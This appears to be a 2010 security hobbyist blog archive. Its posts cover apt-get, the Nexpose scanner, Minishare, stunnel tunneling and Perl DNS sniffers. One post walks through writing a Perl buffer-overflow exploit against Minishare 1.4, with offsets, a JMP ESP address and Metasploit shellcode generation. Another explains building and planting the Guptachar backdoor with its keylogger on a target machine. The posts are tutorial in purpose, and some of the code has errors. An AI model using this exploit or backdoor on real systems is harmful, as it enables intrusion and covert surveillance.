Wednesday, January 27, 2010

Apt-get cheat Sheet

Just something that always comes in handy for me and my short term memory. Apt-get is a package manager tool used to install, remove, update and manage packages (software) on debian/ubuntu based linux machines. I stubbled accross this on another blog and i find it to be short and straight to the point. Hope you may find this useful as well.

Taken from http://archangelamael.blogspot.com/2009/06/using-apt-get-quick-reference.html

There are 3 basic installers in BT4 apt-get the basic command line package
management system. aptitude is a curses based front end for apt-get.
And synaptic which is a gui version. Other than that there really are no major
differences.
Now lets look at some of the commands that are available for us.
First
Code:

# man apt-get

The manual page read it.
Code:

# apt-cache pkgnames

Gives us the names of all the installed packages we have on the system.
The list is not really to organized so add a | pipe and sort to the end and then it will alphabetized.
Code:

# apt-cache search programname

add the name of a program that you want to search for. The command will show software packages with the expression you entered. One problem with apt is that it really needs the exact name of a package for better results.
Code:

# apt-get install packagename

Pretty simple since all the work is now done for you.
There is a caveat to this method of package installation. You can't pass any
configuration options to the program. To remove a package just the opposite
should be done.
Code:

# apt-get remove packagname

This will remove the package but may not remove all configuration files. In order for that do instead
Code:

# apt-get remove --purge packagename

Next updating software.
First:
Code:

# apt-get update

This updates the list of currently installed software, this is the same list that we saw earlier. Next actually updating said list.
Code:

# apt-get upgrade

Now the thing about this command is that it will upgrade to the most recent
version of all packages on the system. This may or may not always be the best way of doing business. Some packages may not work as well as the older ones. Use with care. use a -s before upgrade to simulate, or see which software will be updated. A better way is to use dist-upgrade
Code:

# apt-get dist-upgrade

This will upgrade all packages with conflict resolution and discarding less important packages for more important ones. There are many other commands but the above should help get you started working with apt. Hope it helps.
Credits: This tutorial was created with help from the Debian APT How-To which can be found here: Debian -- Debian Documentation Project
And the man page

Resources/Good Reading:
http://archangelamael.blogspot.com
http://archangelamael.blogspot.com/2009/06/using-apt-get-quick-reference.html

Up and running with Nexpose

Nexpose is a vulnerability scanner made by the team at rapid7 (company that now owns the metasploit project). Its very similar to the popular Nessus, which i haven't blogged about yet but have used in the past (will blog about Nessus soon). Just to point out some of the features quoted from their website at rapid7.com:

  • Unrivaled breadth of vulnerability scanning - scans for more than 11,000 vulnerabilities with nearly 40,000 vulnerability checks based on pre-defined scan templates in networks, operating systems and databases (up to 32 IPs)..
  • Regular vulnerability updates - automatically provides vulnerability updates without user intervention. Delivers immediate Microsoft Patch Tuesday vulnerability updates within 24 hours or less to stay current with the changing threat landscape.
  • Prioritized risk assessment - identifies risk based upon how the vulnerability in one system affects another.
  • Remediation guidance - helps resolve vulnerabilities quickly and easily with the information provided in remediation reports.
  • Accurate scan results - delivers accurate scanning results in less time with an expert system that combines traditional scanning methods with assessment processes modeled after human decision making.
  • Out-of-the box Metasploit integration - works with the Metasploit Framework to provide remote scan control, exploit identification and automated exploitation functionality to NeXpose users.
  • Extensive community support - provides collaboration and knowledge exchange among security professionals via full access to the Rapid7 Community Portal at http://community.rapid7.com.
  • Simple deployment- easily deploys as a software solution on laptops and desktops.
  • No cost start-up security solution - provides a free entry-level vulnerability management solution.
Nexpose can work both on 32 and 64 bit versions of linux and windows. Installation is simple and straight forward as long as you are very precise in following instructions :). I used archangelamael.blogspot.com tutorial to get things up and running.

[Installation:]
http://archangelamael.blogspot.com/2009/12/installing-nexpose-in-back-track-4.html

[Using NeXpose]
http://archangelamael.blogspot.com/2009/12/using-nexpose-in-back-track-4.html

Friday, January 22, 2010

Easy File sharing with Minishare

What can i say, i love small, non-complex tools that get the job done and minishare happens to be one of them. Whenever i leave my house and want to be able access certain files from anywhere without haveing to set up FTP's (most of them tend to be vulnerable to some exploit anyways) and complex webservers. Minishare is the simplest and most elegant solution i've come across. Its quite intuitive to use, reading the user manual is far from necessary, its that easy. Simply run the server and start dragging and dropping your files that you want to share, thats all. To access the files remotely, simply point to the IP of that machine (external IP) using a web browswer and voila, you are presented with the files as a list, where you can click to download them as you please. Most important, its 100% free.

Note: Please download the latest versions of the application. In my previous blog, i blog about a buffer overflow vulnerability in version 1.4, that led to remote code execution. Latest version available at this posting is 1.54.

Resources / Good Reading:
http://minishare.sourceforge.net/

Developing an exploit for buffer overflows...The Entire Life Cycle.

Being a little familiar with reverse engineering windows executables, it wa time for me to take the next step. I'm quite familiar with using metasploit to exploit systems and gain root on systems but being the guy that i am, i like to just know how the underlying technology of things work. Having some background in reverse engineering and exploiting systems was all the prerequsites i needed to take the next big step, writting my own code to exploit systems.

Recently i started learning perl and wrote some nifty sniffer applications that can retrieve passwords and so forth. As everything i learnt in perl was still fresh in my head, i decided to use perl as the platform i would use to write exploits. I also followed this tutorial throughout my learning of writing exploits, even though they used python. I took the extra step in porting the code to perl :).

Needed Software:
minishare 1.4
Ollydebug
Backtrack 4

Minishare is a minimal webserver running on port 80 that shares files. You run the program, add files to it, then you can access these files via a remote web browser and download them. In version 1.4 there was reported that there was a buffer overflow vunerability within the software (http://secunia.com/advisories/13114/). You can find information about software or OS vulnerabilities and exploit codes at websites such as http://secunia.com/advisories/search, www.milw0rm.com and www.exploit-db.com.

Ollydbg is a win32 debuffer/assembler application that i frequently use for reverse engineering purposes.

Open up the minishare.exe in Ollydbg and hit f9 key to start the execution.

The next thing you want to do is trigger the vulnerability. From http://secunia.com/advisories/13114, we see that the exploit is triggered by sending a specially crafted overly long request with a pathname larger than 1787 bytes. So lets get to some perl code.

#!/usr/local/bin/perl
#
#
#
use IO::Socket;
############
$port="80";
$host="192.168.1.60";
$proto="tcp";

$sock = IO::Socket::INET->(PeerPort=> $port, $PeerAddr=> $host, Proto=> $proto) or die ("Connection issue");

$buff="GET ";
$buff .="\x41" x 2000;
$buff .=" HTTP/1.1\r\n\r\n";

print $sock "$buff";
close ($sock);

The above perl code would connect to host 192.168.1.60 on tcp port 80 then send the malformed GET request to crash the minishare server. You should notice that EIP(Instruction pointer) and ESP (Stack pointer) have been over written with values of 41414141 respectively.

We need to find out the offsets of EIP and ESP in our malformed sent string buffer. We use Metasploit's tools, patter_create and patter_offset to aid in this process.

#./patter_create 2000.
Copy the generated characters to your perl code.

#!/usr/local/bin/perl
#
#
#
use IO::Socket;
############
$port="80";
$host="192.168.1.60";
$proto="tcp";

$sock = IO::Socket::INET->(PeerPort=> $port, $PeerAddr=> $host, Proto=> $proto) or die ("Connection issue");

$buff="GET ";
$buff .=("Aa0Aa1....
6Ac7Ac......................
f3Af4A.....");
$buff .=" HTTP/1.1\r\n\r\n";

print $sock "$buff";
close ($sock);

Press ctrl and f2 to restart the execution of minishare from within Ollydbg. Run the new perl code now and note the value of EIP and the value of the location ESP points to. Now goback to our metasploit tools.

#./patter_offset 36684335
1787 //offset for EIP
#./patter_offset 43376843
1791 //offset for ESP

The offset of EIP, we are going to put the location of a location in memory that points back to the stack, i.e, JMP ESP. We are going to search through the loaded application modules (Dlls) and search for any JMP ESP instruction. Note, we want to avoid any address that contains a zero byte \x00. This character is considered a string terminator in the C programming language, and usually has the effect of breaking an exploit when it is included within a buffer. For a similar reason, we also want to avoid the line feed and carriage return characters \x0a and \x0d.

To search for JMP ESP, Withing Ollydbg, goto View -> Loadable modules. I like to use system modules, such as user32.dll and shell32.dll. Right click shell32.dll for example and click on "view code in CPU". Right click in the code view and select search for, then goto command. Type "JMP ESP". When one is found write down that address (7C9D30F3). We are now goingto point to this address in our perl code and replace EIP with it since we know where to put it (remember the offset of EIP was 1787).


#!/usr/local/bin/perl
#
#
#
use IO::Socket;
############
$port="80";
$host="192.168.1.60";
$proto="tcp";

$sock = IO::Socket::INET->(PeerPort=> $port, $PeerAddr=> $host, Proto=> $proto) or die ("Connection issue");

$buff="GET ";
$buff .="\x90" x 1787;
$buff .= "\xF3\x30\x9D\x7C";
$buff .= "\x90" x 16;
$buff .=" HTTP/1.1\r\n\r\n";

print $sock "$buff";
close ($sock);

Note that we wrote the memory address of 7C9D30F3 backwards, i.e , "\xF3\x30\x9D\x7C" as per x86 architechure.

Restart minishare in Ollydbg, set a breakpoint at the memory location of the JMP ESP that we found and run. Exewcute the perl exploit. Notice that it has hit our break point? ALL thats left to do is to put our shellcode in. We turn to metasploit again for this

#./msfpayload windows/exec CMD=calc.exe R | ./msfencode -a x86 -b '\x00\x0A\x0D' -t c

We had to pipe the output of the shellcode to msfencode so we can get rid of the pescky bytes '\x00\x0A\x0D'
'-b' tells it to avoid this list of characters
'-a x86' tells it the architechture to encode as
'-t c' format to display is c code format

Next we copy our shell code to our perl program.

#!/usr/local/bin/perl
#
#
#
use IO::Socket;
############
$port="80";
$host="192.168.1.60";
$proto="tcp";

$sock = IO::Socket::INET->(PeerPort=> $port, $PeerAddr=> $host, Proto=> $proto) or die ("Connection issue");

$buff="GET ";
$buff .="\x90" x 1787;
$buff .= "\xF3\x30\x9D\x7C";
$buff .= "\x90" x 16;
$buff .=
"\xd5\xa0\x76.......".
"\x32\x47\xe8.......".
"\x12\x4f\xd9........".
"\x3c\x76\x1A";
$buff .=" HTTP/1.1\r\n\r\n";

print $sock "$buff";
close ($sock);


Restart in Ollydbg. Send the perl exploit and if all went well, calc.exe should be executed on that machine, i.e. You have just taken advantage of the remote code execution vulnerability.

References/Good Reading:
http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html

Monday, January 18, 2010

Guptachar 2.0 (Remote Administration Tool)

A RAT or remote administration tool allows an admin to remotely administer a remote machine on the same IP network, including the internet. Other RAT tools include VNC viewer, Microsoft remote desktop, backorfice, Netbus etc. While all these tools are similar in many ways and some having more features than the other they all require their own client software to administer the remote machines. Guptachar doesn't. Well it does but you already have it installed on your machine without actually doing so. It uses any webrowser as its client software. You just point your browser to the IP/port combo of the remote machine and you're good to go. Also, Guptachar can only be installed a Windows machinel, however, you can still administer the windows machine with any linux web browser.

Download: http://packetstormsecurity.org/trojans/gupt2.zip

Download and unzip the contents. Open up a command prompt window and run makeqinst.exe and answer the accompanying questions. The program makes a server excuteable that when run would install as a backdoor. It provides some basic authentication and the listening port is custamizable. The resulting executable would be copied to the target machine and then run.

Effects:
Opens up a port on the machine(confirm with a netstat -an).
Name of executable in task manager is GPTCR2.exe.
Creates the following files in C:\WINDOWS directory: GPTCRKL folder, GPTCR.nfo and GPTCR2.exe
Creates a registry entry: HKCU/Sofware/Microsoft/Windows/CurrentVersion/Run/GPTCR2 //please note that the path created is broken and does not link directly to the executable. Im not sure why this was not fixed but the registry key becomes useless unless you manually channge it to the correct path of the GPTCR2.exe executable. This makes the backdoor start up when the machine is rebooted.
Update: It turns out that in the c code, the author used a fixed length of the string path of 14, which results in "c:\windows\gpt". The fix would be to use a length of 21 of let the c code find the length of the path instead of using a fixed length
There maybe one or two other registry entries, just search for them using "GPTCR" as the search query.
The keylogger log file is also created at c:\WINDOWS\GPTCRKL\ directory called LOGFILE.key.

That all the setup required. Now point your web browser to the ip/port combo of this machine and commence your admin duties.


Resources/Good reading:
http://packetstormsecurity.org/trojans/gupt2.zip
http://www.megasecurity.org/trojans/g/guptachar/Guptachar2.0.html

More tunneling with SSL and stunnel

We've discussed tunneling in the past with regards to httptunnel and ptunnel. As effective as these methods are for bypassing firewall rules and other purposes, neither ptunnel or httptunnel provide any means of encryption (although shh tunneling does, something i've discussed in a previous post).
Using programs like wiresark, you can easily see the payloads of the tunneled traffic. SSL tunnel provides similar tunneling funtionalities as the other tunneling programs but provides the much needed encryption to mitigate eaves droppers. I'll disscus all the needed steps to set-up a Windows client and a Linux Server.

Server [linux] - 10.0.0.1
Client [Windows XP] - 10.0.0.2

SERVER Setup:

First thing you need to do is generate a x509 certificate file to be used for encrytion if one doesnt already exist [It should be loacated at /etc/stunnel/stunnel.pem]. I usally like to generate my own and customize the certificate with my name, email, location, etc.

To generate an x509 cert, type:
openssl req -new -x509 -days 365 -nodes -out stunnel.pem -keyout stunnel.pem

After the cert is generated the server can be set up using the following commands:
stunnel -d 2222 -r 127.0.0.1:80 -p /root/stunnel.pem

The server would now be listening on port 2222 for incoming client traffic. Traffic connecting to the servers listening port would be forwarded to 127.0.0.1 at port 80.

CLIENT setup:

Download the Stunnel setup for windows and install. Heres a link to the latest compiled binaries:
http://www.stunnel.org/download/stunnel/win32/stunnel-4.29-installer.exe

Rename the original stunnel.conf file to stunnel.conf.bak for backup purposes.

Now make a file named stunnel.conf in that same directory. Input the following using notepad:

Client = yes
[my_https]
accept = 80
connect = 10.0.0.1:2222

Save this file. Now run stunnel.exe (You can also run from the command line: c:\stunnel.exe stunnel.conf). Stunnel looks for stunnel.conf in the same directory by default. If you choose to use a config file with a different name, you would have to open up the command prompt and type as follows to run: c:\stunnel.exe myconfigfile.conf.Your client would now be listening on port 80. To use the tunnel, type in your browser, http://127.0.0.1:80. You should now see the webpage. This webpage was successfully transfered over your securely created ssl tunnel.

Resources/Good reading:
www.stunnel.org
http://freshmeat.net/articles/ssl-encrypting-syslog-with-stunnel
http://librenix.com/?inode=7126

Tuesday, January 12, 2010

Parsing tcp data without NetPacket::*

Just some code that i wrote that demonstrates how to extract the data contents of a packet without using the NetPackets::* suite of modules. Note that you would have to know the byte starting position(offset) of the data contents of the packet type in order to correctly extract what you will need. In this example, the offset that im using for DNS data is 55 (14 bytes for Ethernet, 20 for IP header, 8 for UDP header and 12 for some dns flags ). Therefore the DNS quesries start at the 55th byte in DNS query packets.

#!/usr/local/bin/perl
#
#
#
use strict;
use Net::Pcap;
##################

my $dev=$ARGV[0];
my $filter = 'udp dst port 53';
my $object;
my $filter_t;
my ($net,$mask,$err,$object);
##################

unless (defined $dev){
print 'Interface not set or is incorrect';
}

print "Sniffing on interface: $dev\n";

if (Net::Pcap::lookupnet($dev, \$net, \$mask, \$err) == -1){
die "Net::Pcap::lookupnet failed - $err";
}

$object = Net::Pcap::open_live($dev, 1500, 0 , 0, \$err );
unless (defined $object){
print 'Unable to create packet cxapture on device - ', $dev, ' - ', $err;
}

if (Net::Pcap::compile($object, \$filter_t, $filter, 1, $mask) == -1){
die 'Unable to compile filter string - ', $filter;
}

Net::Pcap::setfilter($object,$filter_t);
Net::Pcap::loop($object, -1, \&process_packets, 0);
Net::Pcap::close($object);
##########################################

sub process_packets{
my($user_data, $hdr, $pkt) = @_;
my $len = length($pkt);
for (my $count = 55; $count <= $len; $cout++){
my ($data) = sprintf ("%s", chr(ord(substr($pkt,$count,1))));
print "$data";
}
print "\n";
}

Thursday, January 7, 2010

Creating a sniffer using perl

Below is simple program i wrote to sniff live DNS requests so a network admin can have an idea of the websites that a user is requesting in real time.

#!/usr/local/bin/perl

#
#
#
use strict;
use Net::Pcap;
use NetPacket::Ethernet;
use NetPacket::IP;
use NetPacket::TCP;
##################################

# Variable Declarations

my $filter_t;
my ($tcp,$ip,$ethernet);
my ($net,$mask,$err);
my $dev = $ARGV[0]; //takes the network card interface as the first parameter
my $filter = "udp dst port 53"; //this is the filter we are going to use, in tcpdump notaion
my $optimize = 1;
############################################

# Determine network number and mask for use later on when we're compiling our filter
if (Net::Pcap::lookupnet($dev, \$net, \$mask, \$err) == -1){
die 'Cannot determine network number and subnet mask - ' , $err;
}

# create a live pcap capture object
my $pcap_object = Net::Pcap::open_live($dev, 1500, 0, 0, \$err);
if (defined $err){
die 'Failed to create live capture on - ' , $dev , ' - ', $err;
}

Net::Pcap::compile($pcap_object, \$filter_t, $filter, $optimize, $mask); //compile our filter ,$filter and return it in the $filter_t variable
Net::Pcap::setfilter($pcap_object, $filter_t); //set the compliled filter, of $filter_t
Net::Pcap::loop($pcap_object, -1, \&capture_packets, '') || die 'Unable to perform packet capture'; //loop or sniff packets on the network infinitly
Net::Pcap::close($pcap_object); //close the pcap object gracefully
#######################################

# subroutine to handle each packet that is sniffed
sub capture_packets {
my ($user_data, $hdr, $pkt) = @_; //this line should always be present to handle the incoming packets, You refer to the incoming packets from $pkt as you would see from the next lines of code
my $ethernet = NetPacket::Ethernet->decode($pkt); //decodes the ethernet frame
my $ip = NetPacket::IP->decode($ethernet->{data}); // decodes the IP headers
my $tcp = NetPacket::TCP->decode($ip->{data}); // decodes the TCP data
print "$ip->{src_ip} -> $ip->{dest_ip} : "; // prints source to destination IP's
print "$tcp->{data}\n"; //prints the data contained in this packet
}

The unfortunate thing about dns request is that there can be so many of them, even when you request one website. For instance, try going to www.google.com. You would notice that you capture the dns request for www.google.com in addition to a couple other request that the google page itself has made for you.